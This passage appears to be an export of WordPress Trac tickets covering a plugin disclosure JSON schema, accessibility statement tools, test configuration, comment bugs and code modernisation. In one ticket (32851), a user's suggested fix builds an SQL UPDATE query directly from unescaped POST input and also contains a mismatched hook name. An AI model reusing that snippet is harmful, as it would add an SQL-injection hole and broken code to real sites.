sends e-mails."", ""type"": ""boolean"" }, ""subscribed"": { ""description"": ""Whether e-mails are only sent to users that have subscribed for that particular e-mail (e.g. a newsletter)."", ""type"": ""boolean"" } } } } }, }}} {{{#!php <?php ""database"": { ""description"": ""This section contains information about how the software interacts with the site's database (MySQL or MariaDB)."", ""type"": ""object"", ""properties"": { ""writesToDB"": { ""description"": ""Whether or not the code writes to the database."", ""type"": ""object"", ""properties"": { ""auto"": { ""type"": ""array"", ""items"": { ""description"": ""Whether or not the code writes to the database in relation to information that is not explicitly input by a user."", ""type"": boolean }, ""additionalItems"": false }, ""manual"": { ""type"": ""array"", ""items"": { ""description"": ""Whether or not the code writes information to the database that was explicitly input by the user."", ""type"": boolean }, ""additionalItems"": { ""description"": ""A comma-separated list of capabilities that authorize a user to write information to the database within the code."", ""type"": ""string"" } } }, ""CPT"": { ""description"": ""Whether the component creates any Custom Post Types."", ""type"": ""object"", ""properties"": { ""auto"": { ""type"": ""array"", ""items"": { ""description"": ""Whether or not the code automatically creates any Custom Post Types without user intervention."", ""type"": ""boolean"" ""additionalItems"": { ""description"": ""The names of any Custom Post Types that are created automatically by the code without user intervention."", ""type"": ""string"", } }, ""manual"": { ""type"": ""array"", ""items"": { ""description"": ""Whether or not the code allows for users to generate Custom Post Types."", ""type"": ""boolean"", }, ""additionalItems"": { ""description"": ""A comma-separated list of capabilities that authorize a user to create Custom Post Types within the code."", ""type"": ""string"" } } } }, ""customTables"": { ""description"": ""Whether or not the code creates any custom tables in the database."", ""type"": ""object"", ""properties"": { ""auto"": { ""type"": ""array"", ""items"": { ""description"": ""Whether or not custom tables are automatically created by the code without user intervention."", ""type"": ""boolean"" }, ""additionalItems"": { ""description"": ""The names of any custom tables that are automatically created by the code without user intervention."", ""type"": ""string"" } }, ""manual"": { ""type"": ""array"", ""items"": { ""description"": ""Whether or not the code allows the user to create any custom tables."", ""type"": ""boolean"" }, ""additionalItems"": { ""description"": ""A comma-separated list of capabilities that authorize a user to create custom tables within the code."", ""type"": ""string"" } } } } }, }}} {{{#!php <?php ""otherStorage"": { ""description"": ""Provides more information about where information may be stored, other than the database."", ""type"": ""object"", ""properties"": { ""writesToFiles"": { ""description"": ""A comma-separated list of file types the code writes to (e.g. .txt)."", ""type"": ""array"", ""items"": { ""type"": ""string"", } }, ""fileStructure"": { ""description"": ""Whether or not the code makes changes to the website's file structure."", ""type"": ""object"", ""properties"": { ""auto"": { ""description"": ""Whether or not the code makes changes, or is capable of making changes, to the website's file structure that are not explicitly initiated by a user. This should not include files that are added directly from the repository, or in the original .zip file."", ""type"": ""boolean"" }, ""manual"": { ""description"": ""Whether or not the code makes changes, or is capable of making changes, to the website's file structure that are explicitly initiated by the user. This should not include files that are added directly from the repository, or in the original .zip file."", } } } } }, }}} {{{#!php <?php ""automation"": { ""description"": ""Provides more information with regards to action taken by the code without user input."", ""type"": ""object"", ""properties"": { ""cron"": { ""description"": ""Whether the code makes use of scheduled tasks that do not require user input."", ""type"": ""boolean"" } } }, }}} {{{#!php <?php ""ppi"": { ""description"": ""Whether or not the code stores any Protected Personal Information."", ""type"": ""boolean"" }, ""compatibility"": { ""description"": ""Indicates whether or not the code is compatible with Privacy Tools."", ""type"": ""object"", ""properties"": { ""ppiExport"": { ""description"": ""Does the developer, in good faith, consider the code to be compatible with the PPI Export Tool in WordPress?"", ""type"": ""array"", ""items"": [ { ""type"": ""boolean"" } ], ""additionalItems"": false }, ""ppiErasure"": { ""description"": ""Does the developer, in good faith, consider the code to be compatible with the PPI Erasure Tool in WordPress?"", ""type"": ""array"", ""items"": [ { ""type"": ""boolean"" } ], ""additionalItems"": false }, ""consentAPI"": { ""description"": ""Does the developer, in good faith, consider the code to be compatible with the WordPress Consent API?"", ""type"": ""array"", ""items"": [ { ""type"": ""boolean"" } ], ""additionalItems"": false }, ""disclosuresTab"": { ""description"": ""Does the developer, in good faith, consider the code to be compatible with the Disclosure Tab?"", ""type"": ""array"", ""items"": [ { ""type"": ""boolean"" } ], ""additionalItems"": false }, ""permissionsTab"": { ""description"": ""Does the developer, in good faith, consider the code to be compatible with the Permissions Tab?"", ""type"": ""array"", ""items"": [ { ""type"": ""boolean"" } ], ""additionalItems"": false } } }, }}} {{{#!php <?php ""monetization"": { ""type"": ""object"", ""description"": ""This section provides more information about monetization practices. It is included to help facilitate transparency and fair business dealings. Please note that disclosure here does not relieve a developer from any specific obligations that they may have under applicable statutes."", ""properties"": { ""upsells"": { ""description"": ""More information about upselling in the code."", ""type"": ""array"", ""items"": [ { ""description"": ""Does this code promote a paid version, or extensions, or other products or services from the same author(s)?"", ""type"": ""boolean"" } ], ""additionalItems"": { ""description"": ""A comma-separate list of URLs linking to the Terms of Service that apply to any paid version, or extension, or other products or services from the same author(s)."", ""type"": ""string"", ""format"": ""uri"" } }, ""donations"": { ""description"": ""More information about donations that are facilitated by the code."", ""type"": ""array"", ""items"": [ { ""description"": ""Does this code contain any request, or information in order to, donate to the plugin or its developer(s)?"", ""type"": ""boolean"" } ], ""additionalItems"": { ""description"": ""A comma-separated list of URLs linking to the Terms of Service that apply to the platform being used to facilitate donations."", ""type"": ""string"", ""format"": ""uri"" } }, ""backLinks"": { ""description"": ""More information about the code requesting credit."", ""type"": ""array"", ""items"": [ { ""description"": ""Does this code contain or generate, or ask the site owner / admin for permission to generate, backlinks?"", ""type"": ""boolean"" } ], ""additionalItems"": { ""type"": ""string"", ""format"": ""uri"" } }, ""affiliates"": { ""description"": ""More information about affiliate networks that are promoted by the code."", ""type"": ""array"", ""items"": [ { ""description"": ""Does this code contain, or generate affiliate links - i.e. links from which the author may receive conditional compensation, whether in money, or in kind?"", ""type"": ""boolean"" } ], ""additionalItems"": { ""description"": ""A comma-separated list of URLs linking to the Terms of Service that apply to affiliate networks being promoted by the code."", ""type"": ""string"", ""format"": ""uri"" } }, ""advertising"": { ""description"": ""More information about advertising that is facilitated by the code."", ""type"": ""array"", ""items"": [ { ""description"": ""Does the code contain, or generate promotions or recommendations for any products or services not directly under the control of the author(s), for which the author(s) receive any compensation, whether in money, or in kind?"", ""type"": ""boolean"" } ], ""additionalItems"": { ""description"": ""A comma-separated list of URLs linking to the Terms of Service that apply to any products or services that are being advertised by the code."", ""type"": ""string"", ""format"": ""uri"" } } } } } } }}} **Acknowledgements:** Thanks to Timothy for suggesting that we use a .json file instead of plugin and theme headers. Thanks to Swissspidy for information on i18n - see comment below. Thanks to Apedog for suggesting improved phrasing for the ""external"" property's description." carike Future Releases 50673 "Create ""Accessibility Statement"" tool with features equivalent to Privacy Policy Tools" audrasjb General normal normal Future Release feature request reviewing dev-feedback 2020-07-15T22:42:16Z 2023-07-21T17:14:16Z "All websites should have an accessibility statement along with their privacy statements. Building on the privacy policy tools, creating a nearly identical set of tools for creating and managing an accessibility statement would be fabulous! That include: - Ability to auto-create a draft page with draft language - Ability for plugins to add relevant information about their accessibility impacts to the statement draft - Function to get accessibility statement page The W3C has an excellent [policy generator](https://www.w3.org/WAI/planning/statements/) that could potentially provide the outline for the draft statement." mrwweb Future Releases 31085 CPT selector to “Recent Posts” widget Widgets 4.2 normal normal enhancement new dev-feedback 2015-01-21T11:18:12Z 2019-06-05T06:40:29Z "I think that ""Recent Posts"" widget should support selection to show all posts or only in selected CPT." sippis Future Releases 51446 CORS issues with QUnit while running tests Build/Test Tools 5.5 normal normal Awaiting Review defect (bug) new dev-feedback 2020-10-05T04:01:48Z 2020-11-10T02:05:09Z "Hello, For a while I've been having an error when running `grunt test` with the qunit tests; {{{ Running ""qunit:files"" (qunit) task Testing tests/qunit/compiled.html ......................................................................................................................................................................................................................................................................................................OK Testing tests/qunit/index.html Access to XMLHttpRequest at 'file:///wp-admin/admin-ajax.php' from origin 'null' has been blocked by CORS policy: Cross origin requests are only supported for protocol schemes: http, data, chrome, https. Failed to load resource: net::ERR_FAILED ......................................................................................................................................................................................................................................................................................................OK >> 588 tests completed with 0 failed, 0 skipped, and 0 todo. >> 1738 assertions (in 8024ms), passed: 1738, failed: 0 }}} Looking into this a little I was able to resolve these by updating the `tests/qunit/index.html` to use localhost for the ajax urls. Uploading patch but am unsure if it's the correct action, seems to work nicely for me at least and suppresses the error." garrett-eclipse Future Releases 43492 Core Telemetry and Updates Upgrade/Install normal normal Awaiting Review enhancement new dev-feedback 2018-03-07T20:37:53Z 2018-10-10T19:56:13Z "It has been discussed on the #gdpr-compliance and the question had made it's cycle around some other rooms with various replies as well occasionally but it's time to take a final decision. When WordPress requests updates it sends more than enough data needed to actually perform the update. We did a search a bit at some point to take a glimpse of the past and how all those got added in there and why but couldn't find anything specific. There's already a way to modify the call through https://developer.wordpress.org/reference/hooks/core_version_check_query_args/ (and may be more as well) but the concept here is to have everything off by default and add a proper UI and opt-in for the Admins to select what exactly they want to send." xkon Future Releases 44689 Convert user sites (my-sites.php) to table Networks and Sites 3.0 normal normal Awaiting Review enhancement new dev-feedback 2018-08-01T07:02:10Z 2021-01-12T11:52:01Z "I think for better consistence we could add a table in the user's sites in a multisite like everything else in WordPress (super admin sites, users, posts etc.). The Primary Site option could change from the bulk actions." eArtboard Future Releases 49877 Content enclosed by (content enclosing) shortcode gets stripped from excerpt Shortcodes 5.4 normal normal Awaiting Review defect (bug) new dev-feedback 2020-04-11T13:36:57Z 2020-07-24T17:32:51Z "Hi, I’m using a plugin to create popups with information from Wikipedia by enclosing a term in shortcode. Like this “Terwijl voormalig [wiki]Goldman Sachs[/wiki] bankier” (text in Gutenberg Paragraph Block, bold by me) On a Blog Page and in a Latest Posts Block with non-manual excerpts the following output is rendered: “Terwijl voormalig bankier” Both the shortcode and the enclosed content are gone (due to wp_trim_excerpt? as called by the_excerpt() ). Whereas content enclosed in HTML tags stays in place. The excerpt would preferably read: “Terwijl voormalig Goldman Sachs bankier” Is there a way to keep the content enclosed by (content enclosing) shortcode tags in the excerpt? Using Wp 5.4 PHP 7.4 Theme Twenty-twenty (and Blocksy, Astra) Imho I don’t see why you would want to loose your content (in enclosing shortcode tags) once an excerpt is created containing that content" mmwbadmin Future Releases 12945 Constrain wp_page_menu() technosailor* Menus normal normal defect (bug) accepted dev-feedback 2010-04-09T19:39:51Z 2019-06-04T20:02:04Z "The wp_page_menu() function is the default callback for wp_nav_menu(). IOW, when a user is not using the new menu system, it defaults to this function. While that is good, any number of pages over, say 10, will make a theme puke in many cases. As a workaround, I suggest we make a default of wp_page_menu() to exclude all pages() except home. It's a stupid idea, I think, but something needs to be done to make this manageable so I'm looking for feedback. The Pro of taking this approach is that it encourages customization of menus via the WP menu system. It also does not lock theme devs into a particular approach because this stuff can be overidden via arguments and filters. The con is that the default callback becomes pretty benign and useless. Almost pointless. Ideas?" technosailor Future Releases 47719 "Consistency issue with `include` parameter set to ""0"" in `WP_Term_Query`" SergeyBiryukov Query normal normal Future Release defect (bug) reviewing dev-feedback 2019-07-17T09:10:48Z 2021-02-17T07:24:39Z "There is a consistency issue with `include` parameter when used in `WP_Term_query`. If `include` is set to/contains `[0]`, the query returns all terms. This is not consistent with other query classes, like `WP_query` (using corresponding `post_in` parameter) and even more like `WP_User_query` (using the same `include` parameter). Those doesn't return any result. See reproductible examples below: **WP_Query** {{{#!php $args = array( 'post_type' => 'post', 'post__in' => [0], ); $wp_query = new WP_Query( $args ); if ( $wp_query->have_posts() ) : while ( $wp_query->have_posts() ) : $wp_query->the_post(); echo $post->ID; endwhile; endif; }}} `=> returns no post` **WP_user_query** {{{#!php $args = array( 'role' => '', 'include' => [0], ); $wp_user_query = new WP_User_Query( $args ); $users = $wp_user_query->get_results(); if ( ! empty( $users ) ) : foreach ( $users as $user ) : echo $user->ID; endforeach; endif; }}} `=> returns no user` **WP_Term_Query** {{{#!php $args = array( 'taxonomy' => 'category', 'include' => [0], ); $wp_term_query = new WP_Term_query( $args ); if ( ! empty( $wp_term_query->terms ) ) : foreach ( $wp_term_query->terms as $term ) : echo $term->term_id; endforeach; endif; }}} `=> returns all terms` Credits @loicblascos for the initial bug report." audrasjb Future Releases 45761 consistency between $wpdb->blogid and get_current_blog_id() Networks and Sites 3.0 normal normal Awaiting Review defect (bug) new dev-feedback 2018-12-24T20:52:41Z 2019-03-15T13:31:35Z "On a single install (not multisite), you have $wpdb->blogid => 0 get_current_blog_id() => 1 Must be a very old one !!!" arena Future Releases 52331 Consider using more precise browser versions for `browserslist` Build/Test Tools 4.9 normal normal Awaiting Review defect (bug) new dev-feedback 2021-01-20T18:52:13Z 2021-07-27T15:10:48Z "The `browserslist` array within the `package.json` file is used to inform the `autoprefixer` package which CSS vendor prefixes should be present in Core CSS files. This process happens when `npm run grunt precommit:css` is run. **Within `trunk`** Currently, browser support is defined relatively as such: - Browsers with > 1% global usage. - IE >= 11. - The last 1 version of Android and ChromeAndroid. - The last 2 versions of Chrome, Firefox, Safari, iOS (which generally is the same version as Safari since the versions coincide), Edge, and Opera. Since Chrome version 25, the Android and desktop versions of Chrome are aligned with stable releases available at the sime time between the two. **Because of this, the ChromeAndroid item can probably be removed, or should be updated to `last 2 ChromeAndroid` to be accurate.** **Older Branches** These relative values work within `trunk`, but they could potentially cause issues in older branches over time. Values are relative to the day the command is run and not to when each major version was released. Running `npm run grunt precommit` while working within older branches will eventually result unwanted CSS changes as more new browser versions are released. I'm proposing that when a major version is branched, the `browserslist` array gets updated with precise versioning to ensure that the browsers supported on release day will continue to be supported into the future, and prevents unnecessary/undesired CSS changes within minor releases. The `> 1%` should also be removed after branching because usage changes over time, and this could also result in some vendor prefixes being unintentionally removed. For the 5.6 branch, the below values would be used. ||= Browser =|| Version || || `ie` || `>= 11` || || `Android` || `>= 11` || || `ChromeAndroid` || `>= 87` || || `Chrome` || `>= 87` || || `Firefox` || `>= 81` || || `Safari` || `>= 13` || || `iOS` || `>= 13` || || `Edge` || `>= 41` || || `Opera` || `>= 66` || WordPress 4.9 was the first major version to use relative versioning (see [41062]). I've gone and done some research, and below is the list of browser versions on each major version's release day that would have met the relative requirements. || WP Version || IE || Android || ChromeAndroid || Chrome || Firefox || Safari || iOS || Edge || Opera || || 5.6 (12/8/2020) || 11 || 11 || 87 || 87 || 81 || 13 || 13 || 41 || 66 || || 5.5 (8/11/2020) || 11 || 10 || 83 || 83 || 79 || 12 || 12 || 41 || 66 || || 5.4 (3/31/2020) || 11 || 10 || 79 || 79 || 73 || 12 || 12 || 41 || 65 || || 5.3 (11/12/2019)|| 11 || 10 || 77 || 77 || 69 || 12 || 12 || 40 || 63 || || 5.2 (5/7/2019) || 11 || 9 || 73 || 73 || 65 || 11 || 11 || 40 || 58 || || 5.1 (2/21/2019) || 11 || 9 || 71 || 71 || 63 || 11 || 11 || 40 || 57 || || 5.0 (12/6/2018) || 11 || 9 || 70 || 70 || 62 || 11 || 11 || 40 || 56 || || 4.9 (11/16/2017) || 11 || 8 || 61 || 61 || 56 || 10 || 10 || 40 || 48 ||" desrosj Future Releases 52977 Consider using basic auth in https healh check. Site Health 5.7 normal normal Awaiting Review defect (bug) new dev-feedback 2021-04-06T00:14:57Z 2023-09-08T00:39:23Z "If the WordPress dashboard is behind basic auth, in some checks the site health component will pass the authentication through to background HTTP requests (the wp-cron tests does this for example). The https detection test does not do this, it would be worth discussing whether it should: * always do this * send a second request with basic auth if the first request fails * something similar not listed here :) Follow up to #52783." peterwilsoncc Future Releases 52610 Consider removing many of the default test group exclusions Build/Test Tools normal normal Awaiting Review task (blessed) new dev-feedback 2021-02-22T19:57:39Z 2021-04-29T15:46:12Z "When the tests are run with `composer test`, the following groups are excluded: * `ajax` * `ms-files` * `ms-required` * `external-http` When the tests are run with Multisite enabled with `composer test -- -c tests/phpunit/multisite.xml`, the following groups are excluded: * `ajax` * `ms-files` * `ms-excluded` * `external-http` * `oembed-headers` The `ms-required` and `ms-excluded` group exclusions are needed so that the Multisite-specific tests and single-site-specific tests don't run when they don't need to. It's less clear why the other groups in these lists are excluded by default. The `ajax` and `ms-files` groups are not slow, so excluding them for performance reasons doesn't make sense. I think the `ajax` exclusion should be removed from both the single site and Multisite configuration. The `ms-files` exclusion should be removed too because the tests in the `ms-files` group don't get registered on a non-Multisite test run so the exclusion is redundant. The `external-http` tests are excluded because they are somewhat slow, taking around 10-15 seconds on GitHub Actions and around 40 seconds on my local, highly dependent on network connection speed. Let's keep these excluded by default. The `oembed-headers` group is excluded by default because it requires Xdebug, however this is already covered by the `@requires function xdebug_get_headers` tag on the only test in this group, along with being in the `debug` group which runs separately on GitHub Actions. The `oembed-headers` group exclusion can be removed as it's redundant. Here's my proposed new config for `phpunit.xml.dist`: {{{ <exclude> <group>ms-required</group> <group>external-http</group> </exclude> }}} and for `multisite.xml`: {{{ <exclude> <group>ms-excluded</group> <group>external-http</group> </exclude> }}}" johnbillion Future Releases 40373 Conditionally initialize Playlist Media Element Media 4.7.3 normal normal Future Release enhancement new dev-feedback 2017-04-05T15:54:22Z 2019-01-24T21:48:32Z "The single element media player (https://develop.svn.wordpress.org/trunk/src/wp-includes/js/mediaelement/wp-mediaelement.js) uses a special jQuery filter to remove already initialized media elements from the initialization process: Source: https://develop.svn.wordpress.org/trunk/src/wp-includes/js/mediaelement/wp-mediaelement.js Lines: 43~49 {{{ // Only initialize new media elements. $( '.wp-audio-shortcode, .wp-video-shortcode' ) .not( '.mejs-container' ) .filter(function () { return ! $( this ).parent().hasClass( 'mejs-mediaelement' ); }) .mediaelementplayer( settings ); }}} However, a similar approach is not implemented for the Playlist element and might be needed. Source: https://develop.svn.wordpress.org/trunk/src/wp-includes/js/mediaelement/wp-playlist.js Lines: 167~171 Original Code: {{{ $(document).ready(function () { $('.wp-playlist').each( function() { return new WPPlaylistView({ el: this }); } ); }); }}} Should probably be (my suggestion): {{{ // Only initialize new media elements. $(document).ready(function () { $('.wp-playlist') .not(':has(.mejs-mediaelement)') // <-- Filter out already initialized playlist media elements .each( function() { return new WPPlaylistView({ el: this }); } ); }); }}} I have tested both media elements (single player and playlist player) on an Ajax-based WordPress theme, and I've noticed that an already initialized playlist media element stops playing when the wp-playlist.js file is reloaded on a new page load. When the conditional (patch above) is placed in the code, the playlist element continues playing without problem on subsequent page loads. Awaiting feedback." kostasx Future Releases 60689 Concerning use of external libraries External Libraries normal normal Awaiting Review feature request new dev-feedback 2024-03-05T08:20:16Z 2024-03-05T10:17:53Z "As you get more advanced in using wordpress the need arises to use external libraries like bootstrap,font library,icon libraries,tailwind etc,off course this can be added using insert code plugins.the biggest disadvantage of this is that 1.you cannot maintain libraries version 2.You cannot delete the libraries. This problem can be solved through a feature request to create an interface to manage external libraries.In this feature: 1.User adds external libraries through a url 2.user can edit the libraries url 3.user can delete the libraries,libraries ceases to exist in the wordpress environment 4.Ability of the interface to distinguish/or give user opportunity to distinguish between <link> and <script> for proper placement in the page layout Thanks" warui1738 Future Releases 16365 Comment transition for new comments Comments 3.1 normal minor enhancement new needs-docs 2011-01-24T21:07:46Z 2019-06-04T19:22:11Z "As far as I can tell wp_transitions_comment_status() does not get called for new 'comments' based on my testing and review of comment.php in wp-includes. There is a similar transition for posts that gets called for new 'posts' including hooks like 'new_to_publish' and 'new_to_private'. I feel that there should be a similar hook to this form comments so that plugins can hook into new comments differently from comments moved from one existing status to another (like comment_unapproved_to_approved'." MattyRob Future Releases 39958 Comment reply/cancel links work badly when comment form is above the comment list Comments normal normal Awaiting Review defect (bug) new dev-feedback 2017-02-23T22:36:25Z 2018-01-15T14:41:01Z "If the comment form is below the list of comments, as in default WP themes, reply and cancel links work as follows: When you click reply, the form moves directly under the comment (page doesn't scroll). When you click cancel, the form jumps back to original position (page doesn't scroll). Consider any theme where the comment form is output before the list of comments. (This is a standard request, to make it easier for people to comment without having to scroll through lots of existing comments first). When you click reply, the form moves from its original position to under the comment, causing the whole page to scroll up a significant amount. The textarea gets focus, meaning if it has scrolled off the top of the screen as is quite likely, the page jumps to ensure it is visible, but you don't see important things like the reply heading, cancel link, or comment label. When you click cancel, the form reverts back to its original position, jumping the whole page content down significantly, often leaving you in a completely random part of the page. This is very disorientating from a user perspective. I'm not sure what a workaround is - perhaps some way of saving your vertical position prior to a click and restoring it after a click to make it look like there is no jump." smerriman Future Releases 12363 Comment permalink wrong when only listing one comment type wonderboymusic Comments 3.0 normal normal defect (bug) assigned dev-feedback 2010-02-24T14:31:51Z 2019-06-04T19:21:46Z "If you pass the `type` parameter to `wp_list_comments()` (for example, to show comments only and no pings), then comment permalinks can easily use the wrong page number as they expect there to be pings included. This is apparent after leaving a comment and WordPress attempts to redirect back to your new comment. At first I was thinking you could tell WordPress that you're filtering to a type and it could compensate when determining the page number, but then I realized perhaps it'd just be better for `wp_list_comments()` to check if there were 0 comments returned for the query and if so, see if there are any of that type of comment available. If so, then we know we're on too high of a page number and can instead display the highest existing page. Then again this introduces SEO issues. Ideas on what to do are welcome." Viper007Bond Future Releases 29462 comment pagination in reverse order should display a full number of the latest comments Comments 3.9 normal normal Future Release defect (bug) reopened dev-feedback 2014-09-02T07:12:47Z 2021-03-16T16:01:41Z "set the following discussion setting: break comment into pages with 5 top level comments per page and the last page displayed by default Comments should be displayed with the newer comments at the top of each page have a post with 6 comments only the last comment made is displayed by default instead of the expected 5 last comments." mark-k Future Releases 46642 Comment form content textarea shouldn't be a required field Comments 5.1 normal major Awaiting Review defect (bug) new dev-feedback 2019-03-25T17:40:00Z 2020-01-23T11:07:04Z "there's a note on the top of the comment form that states: "" Required fields are marked "" and the comment <textarea> is marked required but not marked with an ""*""" bckelley Future Releases 32851 Comment e-mail address of registered user not updated when user's e-mail address is changed Comments normal major Future Release defect (bug) new dev-feedback 2015-07-01T05:13:01Z 2020-09-30T20:17:48Z "when i have register on blog and i have add 4 comment on different post. Now 2'nd day i have change my email address on my profile. now any one comment's reply is email gone my old email address which is not change after profile update on comments. i have fix this issue on one member please review it 2 link for more info. i hope u will understand me. [https://wordpress.org/support/topic/update-old-comments-with-new-registered-user-email-address?replies=6] [https://wordpress.org/support/topic/development-bump] now i have fix this bug using this one code {{{ function user_profile_update($user_id) { $commentarr = array(); global $wpdb; if( !current_user_can( 'edit_user', $user_id ) ){ return false; } if(isset($_POST['email'])): echo $email = esc_attr($_POST['email']); $wpdb->query(""UPDATE $wpdb->comments SET comment_author_email='$email' WHERE user_id=$user_id""); endif; } add_action('personal_options_update','my_profile_update', 10,2); add_action('profile_update', 'user_profile_update', 10,2); }}} " ravipatel Future Releases 53041 colors.css is using the old blue. Formatting 5.7.1 normal minor Awaiting Review defect (bug) new dev-feedback 2021-04-15T12:51:29Z 2021-04-15T12:51:29Z "I love the new color pallet, but I noticed that colors.css overrules the new link color in common.css. colors.css is still using hex 0073aa, while common.css is using hex 2271b1. " DuisterDenHaag Future Releases 43331 Color picker breaks admin panel in many templates Administration normal normal Awaiting Review defect (bug) new close 2018-02-15T13:05:04Z 2022-12-02T11:42:09Z "The error prevents the document from beign saved. '''Console error:''' color-picker.min.js?ver=4.9.4:1 Uncaught TypeError: Cannot read property 'addClass' of undefined at a.(anonymous function).(anonymous function).close (https://www.szybkiangielski.pl/wp-admin/js/color-picker.min.js?ver=4.9.4:1:3088).... '''Error is caused by line 316 in color-picker.js''' this.inputWrapper.addClass( 'hidden' ); '''I corrected the code by replacing the code with:''' if(typeof this.inputWrapper !== ""undefined"") { this.inputWrapper.addClass( 'hidden' ); } '''This stops the error, page can now be saved and color picker works fine''' " grzecho Future Releases 44837 Coding Indentation Issues Administration 4.9.8 normal minor Awaiting Review enhancement new dev-feedback 2018-08-24T09:00:25Z 2019-04-01T22:07:36Z "I am seeing in wp-admin files that coding indentation is missing like this file edit-tags.php The codes are written like this {{{ <form class=""search-form wp-clearfix"" method=""get""> <input type=""hidden"" name=""taxonomy"" value=""<?php echo esc_attr( $taxonomy ); ?>"" /> <input type=""hidden"" name=""post_type"" value=""<?php echo esc_attr( $post_type ); ?>"" /> <?php $wp_list_table->search_box( $tax->labels->search_items, 'tag' ); ?> </form> }}} which needs to be indented properly to make it more understandable. This can be check in other files as well where we are writing HTML as well as PHP. In this tickets preview how exactly the code is written so I am adding a screenshot as well https://prnt.sc/kmcjeu" prashantvatsh Future Releases 58874 Code Modernization: Consider using the null coalescing operator. costdev* General normal normal Future Release enhancement accepted dev-feedback 2023-07-22T05:41:48Z 2024-03-11T06:27:11Z "== Overview There are currently around 500 instances of `isset( $var ) ? $var : 'default'` in Core. In [https://make.wordpress.org/core/2020/03/20/updating-the-coding-standards-for-modern-php/ Updating the Coding Standards for modern PHP], the proposal states: > The spaceship `<=>`, null coalesce `??` and null coalesce equals `??=` operators can not be used in WordPress Core until the minimum PHP version has been raised to PHP 7.0 (spaceship and null coalesce) or PHP 7.4 (null coalesce equals). With [https://make.wordpress.org/core/2023/07/05/dropping-support-for-php-5/ the dropping of PHP 5 support in WordPress 6.3], we can now make use of the [https://www.php.net/manual/en/migration70.new-features.php#migration70.new-features.null-coalesce-op null coalescing operator]. > The null coalescing operator (`??`) has been added as syntactic sugar for the common case of needing to use a ternary in conjunction with `isset()`. It returns its first operand if it exists and is not `null`; otherwise it returns its second operand. > [https://www.php.net/manual/en/migration70.new-features.php#migration70.new-features.null-coalesce-op PHP.net] This allows changes from: {{{#!php <?php $new_var = isset( $var ) ? $var : 'default'; $new_var = isset( $arr['key']['subkey'][0] ) ? $arr['key']['subkey'][0] : 'default'; $new_var = isset( $obj->prop ) ? $obj->prop : 'default'; }}} to: {{{#!php <?php $new_var = $var ?? 'default'; $new_var = $arr['key']['subkey'][0] ?? 'default'; $new_var = $obj->prop ?? 'default'; }}} == Proposal This ticket proposes that we update these as the above instances often result in very long lines or very cumbersome conditions. This follows on from similar changes to use `str_starts_with()`, `str_ends_with()` and `str_contains()`, helps usher in the bump to a PHP 7 minimum for WordPress in a safe way compared to other PHP 7+ features, and promotes increased contribution as prospective contributors see WordPress not just enforcing a minimum PHP version or using new features in ''new'' code, but modernising its ''existing'' codebase. As we're very early in 6.4-alpha, making this change now is as ""perfect"" as we could hope to be considering this will invalidate ''some'' patches. However, given the verbosity of `isset()` ternaries, these usually occur on their own line with very little extra code, so the number of invalidated patches should be ''relatively'' low. == Considerations 1. Backporting: This may add extra work if backports involve changing lines containing the affected `isset()` ternaries. This applies to security backports as well as WordPress 6.3 minor releases. However, our earlier changes to `str_starts_with()`, `str_ends_with()` and `str_contains()` had a greater risk of creating extra work. 2. Invalidated patches: Patches that change lines containing the affected `isset()` ternaries will need a refresh. This ''is'' a negative, but it's also likely to be relatively straightforward to resolve for each patch. Our earlier changes to `str_starts_with()`, `str_ends_with()` and `str_contains()` risked invalidating many more patches compared to this proposal. 3. Readability: While objectively this is a benefit for brevity, readability is subjective. 4. [https://make.wordpress.org/core/handbook/contribute/code-refactoring/ Code refactoring should not be done just because we can]: This page details several things needed for proposals such as this: - **Unit tests**, even if the code was not previously covered. We can’t afford regressions, and this will improve our test coverage. - The behaviour of the null coalescing operator is the same as `isset( $var ) ? $var : 'default'`. This proposal does not suggest changing any other instances at this time. - **Performance benchmarks**, before and after. We can’t afford regressions. - The behaviour and performance of the null coalescing operator is the same as `isset( $var ) ? $var : 'default'`. This proposal does not suggest changing any other instances at this time. - **Proper justification and clear rationale of changes are both necessary**. Too often it is impossible to determine the purpose, objective, or focus of these patches. Code should not be rewritten under the cloaks of readability, narrow personal opinion, or general subjectiveness. - Much like the changes to `str_starts_with()`, `str_ends_with()` and `str_contains()`, this provides brevity in the codebase, and per-instance has a much greater reduction in code. - It reduces our time reading and writing code - I appreciate there will be an adjustment period for some. - It provides a clear signal to prospective contributors and to extenders that WordPress is moving forward, encouraging participation and observation for future changes." costdev Future Releases 39883 Code hooking on `image_downsize` can no longer assume the file is an image joemcgill Media 4.7 normal normal Future Release defect (bug) assigned dev-feedback 2017-02-15T19:52:34Z 2017-05-23T20:29:02Z "In r38949, Core pretty drastically changed the expectations that any code hooking onto the `image_downsize` filter could make until then, potentially leading to issues for integrators. We went from having the `image_downsize()` function immediately return `false` if a file wasn't an image, not getting to that filter application at all, to only setting a variable with the result of the `wp_attachment_is_image( $id )` test and now applying the filter (not even passing said result, for that matter). This was a pretty big safe assumption to take away from under integrators' feet. Coupled to this, a wise integrator that might have picked up on this change could have wanted to have its own code have `image_downsize()` still returning `false` if it does not want to have the file further processed by the function, but there is no opportunity to, since returning `false` will cause `image_downsize()` to keep on with its processing instead of proceeding with `return $out`. Returning anything but false or null will cause `image_downsize()` to return, but that might not always be desirable to preserve the way WP worked prior to 4.7. What's better here for general use isn't as clear cut as what r38949 made it to be. I've discussed the case with @mikeschroder, and we've agreed to open this ticket so we can further discuss what should be done, if anything." stephdau Future Releases 39891 Chrome rendering issue with Customizer, widgets, and checked radios Customize normal normal Future Release defect (bug) new dev-feedback 2017-02-16T16:38:59Z 2021-05-29T16:56:54Z "Steps to reproduce: - Open up Chrome (at least on Mac, have not tested on PC) - Open up the Customizer - Edit any sidebar - Add any widget '''that contains at least one radio field that is checked''' - Reduce the height of the browser window until a vertical scrollbar appears in the pane Once the vertical scrollbar appears, the entire pane vanishes. Upon further investigation, it appears to be Chrome ""max-width paint"" type issue. Basically, the checked radio element sets a `text-indent` of `-9999px` on the `:before` item to hide the browser rendered checkmark. It seems that this expands the width of the painted area very very far to the left (outside the visible window). I say this because if you mess around with the indent by lowering it, eventually the bug disappears. You can even see the right side of the painted area vanish (screencast attached showing this below). Here's some CSS changes I tried that fixed it: - Lower the text-indent to something higher (as in smaller negative number) than about `-8000px` - Set the `.widget` element position to `static` (previously set to `relative`) Here's some screencasts: Detailing how to create the bug: [[Image(http://d.pr/i/WEil+)]] Example showing why I think it's some sort of ""max paint width"" rendering issue: [[Image(http://d.pr/i/gLzq+)]] Example showing how setting the `position` on the `.widget` item to `static` fixes things: [[Image(http://d.pr/i/4P9a+)]]" joelworsham Future Releases 30023 Chrome 